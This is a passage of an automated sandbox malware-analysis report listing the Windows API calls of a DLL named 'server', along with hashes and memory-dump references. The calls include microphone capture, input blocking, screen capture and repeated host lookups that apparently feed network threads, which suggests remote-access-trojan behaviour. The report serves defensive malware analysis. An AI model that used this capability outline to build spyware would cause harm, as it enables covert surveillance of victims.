                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@CreateFile
                                • String ID:
                                • API String ID: 1804927778-0
                                • Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                                • Instruction ID: 535a8f0a5c1657d4f4a0f8731bc608884a1cc126f303587fb67b32ffd65e399e
                                • Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                                • Instruction Fuzzy Hash: 3D21C176300351ABF310DB65EC88F6BB799EBC5761F10852AF745DB280D6B1A8058771
                                APIs
                                • waveInGetNumDevs.WINMM(?,?,?,10002E20), ref: 10002EF5
                                • CreateThread.KERNEL32(00000000,00000000,10003060,?,00000004,?), ref: 10002F1E
                                • waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?,?,?,?,10002E20), ref: 10002F40
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$CreateDevsOpenThread
                                • String ID:
                                • API String ID: 3981276002-0
                                • Opcode ID: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                • Instruction ID: 398045f82957bc6df3ca42976268de9e0ed9c6986921e5dfa378deda77a8059f
                                • Opcode Fuzzy Hash: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                • Instruction Fuzzy Hash: 0A216DB5240312AFE314CF68DC84F62B7A9FB89350F204669F645CB685CB71E851CBA0
                                APIs
                                • Sleep.KERNEL32(0000000A), ref: 1000F78C
                                • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F7A7
                                • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F7BA
                                • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F7D6
                                • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F7E9
                                  • Part of subcall function 1000F260: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                  • Part of subcall function 1000F260: CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                  • Part of subcall function 1000F260: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                • BlockInput.USER32(?), ref: 1000F7F8
                                  • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000000), ref: 1000FB47
                                  • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000001), ref: 1000FB50
                                • BlockInput.USER32(00000000), ref: 1000F82B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 1415795360-0
                                • Opcode ID: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                • Instruction ID: d37ac442a261cbdb69aff6c5209fa7087b7225f6be27279a8c23c941b82a95ba
                                • Opcode Fuzzy Hash: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                • Instruction Fuzzy Hash: D521F63434839421F944EB344CA3BBA278ACF85BD4F10053DB6956F9C7CEE1A849B655
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006DE0
                                • CloseHandle.KERNEL32(00000000), ref: 10006DE9
                                • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006DFA
                                • CloseHandle.KERNEL32(00000000), ref: 10006DFD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005190,00000000,00000000,00000000), ref: 10006E22
                                • CreateThread.KERNEL32(00000000,00000000,Function_00006AD0,00000000,00000000,00000000), ref: 10006E35
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004940,00000000,00000000,00000000), ref: 10006E48
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandle
                                • String ID:
                                • API String ID: 738052048-0
                                • Opcode ID: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                • Instruction ID: bddd40b6041f7b89adb1d7152d05c651aa16d4d0b1a7c0af783e3df771abeb65
                                • Opcode Fuzzy Hash: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                • Instruction Fuzzy Hash: E321427178035576F234AB658C47F466AD5EB94B60F310529F785BF2D0CAF4B8408A5C
                                APIs
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10003072
                                • SetEvent.KERNEL32(?,?,00000000,00000000), ref: 100030A4
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 100030AC
                                • waveInAddBuffer.WINMM(?,000003C0,00000020,?,00000000,00000000), ref: 100030C6
                                • TranslateMessage.USER32(?), ref: 100030DB
                                • DispatchMessageA.USER32(?), ref: 100030E6
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100030F7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                • String ID:
                                • API String ID: 3294988761-0
                                • Opcode ID: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                • Instruction ID: d3f2bca1204f73eed7e2b61ebc1a15db6f1c2b26f9a106d8012aa4ef57a1d5f5
                                • Opcode Fuzzy Hash: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                • Instruction Fuzzy Hash: 6411AF71204351ABF320DF64DC88F67B7E9EB88760F004A2DFA0197290E7B5E908CB61
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006D1F
                                • CloseHandle.KERNEL32(00000000), ref: 10006D28
                                • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006D39
                                • CloseHandle.KERNEL32(00000000), ref: 10006D3C
                                • CreateThread.KERNEL32(00000000,00000000,10006AD0,00000000,00000000,00000000), ref: 10006D74
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandle
                                • String ID: gfff
                                • API String ID: 738052048-1553575800
                                • Opcode ID: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                • Instruction ID: 2020a1e7590e07279854810b9ce9ec764bac815170356a4596bb53d82c307b61
                                • Opcode Fuzzy Hash: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                • Instruction Fuzzy Hash: C711EC72B4031527F228D6299C46F1666D6EBD4760F25412AF745FB2D4C5F4BC408649
                                APIs
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1DA
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1E2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F0
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F8
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F204
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F20A
                                • DestroyCursor.USER32(?), ref: 1000F234
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                • String ID:
                                • API String ID: 2236516186-0
                                • Opcode ID: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                • Instruction ID: 0f553e4c3eadbe8d6fbd977fb2ead2f207a6b34009dca0ff4597f70e2537c953
                                • Opcode Fuzzy Hash: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                • Instruction Fuzzy Hash: A2215BB5200755ABE324DF59CC80B66F3A9FB89720F110B1DE56283690C7B5B8058B90
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D3C5
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D3D3
                                • RtlDeleteCriticalSection.NTDLL(?), ref: 1000D40C
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D417
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                • String ID: closesocket$ws2_32.dll
                                • API String ID: 1041861973-181964208
                                • Opcode ID: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                • Instruction ID: 90d420deef0742d789c7d7b03315d7db99f4f8719d0783f2fb5b7f6c44804b8f
                                • Opcode Fuzzy Hash: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                • Instruction Fuzzy Hash: EB11A0755047859BE300DF28CC44B5AB7E8FF49761F400B2EF96AD3290D7B899048AA1
                                APIs
                                • lstrlen.KERNEL32(00000000,?,00000000,100075E0,00000000), ref: 10007C31
                                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C3A
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,100075E0,00000000), ref: 10007C41
                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C49
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,100075E0,00000000), ref: 10007C5F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007C72
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007C79
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@ByteCharMultiWidelstrlen$??3@
                                • String ID:
                                • API String ID: 1676418047-0
                                • Opcode ID: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
                                • Instruction ID: e6a01bf69eca8877366d52572196cd1e750499aaefb071a1afc55558adb3dbc2
                                • Opcode Fuzzy Hash: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
                                • Instruction Fuzzy Hash: F7F0C273A052793BF12066A65C89FAB3B5DDB92BB0F100226F614AA2C0D9946C1186B6
                                APIs
                                  • Part of subcall function 10003740: RtlEnterCriticalSection.NTDLL(10002690), ref: 10003748
                                  • Part of subcall function 10003740: RtlLeaveCriticalSection.NTDLL(10002690), ref: 10003761
                                • _ftol.MSVCRT ref: 10003E6F
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 10003EAE
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$??2@??3@EnterLeave_ftol
                                • String ID:
                                • API String ID: 2245774403-0
                                • Opcode ID: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                • Instruction ID: 4abf8248d303709f5cc18c5d73ebea0275a85850dc47ce3d48f28f5182355441
                                • Opcode Fuzzy Hash: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                • Instruction Fuzzy Hash: C34196797047045BE705EF249C42A7FB39DEBC4794F00492DFA0597286EE34B90D87A2
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FD4A,?,?,00000001), ref: 1001026B
                                • GetDC.USER32(00000000), ref: 100102C6
                                • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 100102D3
                                • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100102E6
                                • ReleaseDC.USER32(00000000,00000000), ref: 100102EF
                                • DeleteObject.GDI32(00000000), ref: 100102F6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
                                • String ID:
                                • API String ID: 1095915628-0
                                • Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                • Instruction ID: 78a216903de2e8302ceba6b2a70ee99028da7e5e411dfa4f1e5e99106784fed4
                                • Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                • Instruction Fuzzy Hash: 9F31F5712057418FE324CF29CC84B5AFBE6FF85304F188A6DE5958F2A1E7B1A549CB50
                                APIs
                                  • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT ref: 10006E9B
                                  • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT(?), ref: 10006EAA
                                • lstrlen.KERNEL32(?), ref: 10011E0B
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 10011E28
                                • lstrlen.KERNEL32(?), ref: 10011E68
                                • Sleep.KERNEL32(00000001), ref: 10011EAD
                                • LocalSize.KERNEL32(00000000), ref: 10011EB4
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 10011EC6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$??2@lstrlen$AllocFreeSizeSleep
                                • String ID:
                                • API String ID: 3002304083-0
                                • Opcode ID: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                • Instruction ID: 77e4d1ca07d08acbcddfd6096d60104819a82ef412391c00f2a2c794c29ddd91
                                • Opcode Fuzzy Hash: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                • Instruction Fuzzy Hash: D131AE756083428FD314CF58C884B5ABBE5FB89750F500A1CF99697350DB74ED45CB92
                                APIs
                                • inet_addr.WS2_32(?), ref: 100050A8
                                • gethostbyname.WS2_32(?), ref: 100050B4
                                • inet_ntoa.WS2_32(?), ref: 100050DE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000514C
                                • CloseHandle.KERNEL32(00000000), ref: 1000514F
                                • CreateThread.KERNEL32(00000000,00000000,10004FF0,00000000,00000000,00000000), ref: 1000517B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                • Instruction ID: cfe0648d242c00018cb7dca233d2f890e554d2c8424b1bc925b856dd57eae328
                                • Opcode Fuzzy Hash: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                • Instruction Fuzzy Hash: 3C21E2327403155BE328DB389C85B6B77E2FB84760F65462DFA52A72D0CEF4AC048658
                                APIs
                                • inet_addr.WS2_32(?), ref: 10004228
                                • gethostbyname.WS2_32(?), ref: 10004234
                                • inet_ntoa.WS2_32(?), ref: 1000425E
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100042CC
                                • CloseHandle.KERNEL32(00000000), ref: 100042CF
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 100042F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                • Instruction ID: bd1dde3535a19e8c7e55d02713a8ca2fab0bdaef4a4b0867c8bad2423498b820
                                • Opcode Fuzzy Hash: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                • Instruction Fuzzy Hash: 2821C7727403155BE328DB349C45B2A76E2FBC4760F65461DFA56A72D0CEB4EC048618
                                APIs
                                • inet_addr.WS2_32(00000002), ref: 10004C88
                                • gethostbyname.WS2_32(00000002), ref: 10004C94
                                • inet_ntoa.WS2_32(?), ref: 10004CBE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004D2C
                                • CloseHandle.KERNEL32(00000000), ref: 10004D2F
                                • CreateThread.KERNEL32(00000000,00000000,10004BC0,00000000,00000000,00000000), ref: 10004D58
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                • Instruction ID: 85862d7f0f71f0c49f886932ab5ba76a0be675f07226ac381a57201f8fc0328c
                                • Opcode Fuzzy Hash: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                • Instruction Fuzzy Hash: D021C7727407155BE328DB349C85B1A76E2FBC4760F65462EFA56A72D0CFB4EC048618
                                APIs
                                • inet_addr.WS2_32(?), ref: 10004F08
                                • gethostbyname.WS2_32(?), ref: 10004F14
                                • inet_ntoa.WS2_32(?), ref: 10004F3E
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004FAC
